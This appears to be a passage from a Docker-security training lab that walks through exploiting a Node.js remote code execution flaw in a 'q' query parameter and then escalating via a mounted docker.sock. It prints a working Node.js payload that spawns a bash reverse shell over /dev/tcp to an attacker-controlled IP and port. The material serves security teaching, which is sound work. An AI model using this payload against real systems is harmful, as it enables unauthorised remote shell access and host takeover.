Attacking insecure volume mounts - Scenario

In this scenario we will be exploiting a NodeJS application using remote code execution to gain a reverse shell. Then we will use the volume mounted docker.sock to gain privileges in the host system with docker runtime.

The application is running at CTF VM. You can access it by navigating to http://CTFVMIP

node app home page

This NodeJS application is vulnerable to remote code execution (RCE) in q GET parameter. Access the endpoint using http://CTFVMIP/?q="docker"

vulnerable parameter

To exploit this RCE, we will be using below payload. Here 192.168.56.3 need to replace with your student VM IP

require("child_process").exec('bash -c "bash -i >%26 /dev/tcp/192.168.56.3/5555 0>%261"')

Attacking and Auditing Docker Containers and Kubernetes Clusters

Attacking insecure volume mounts - Scenario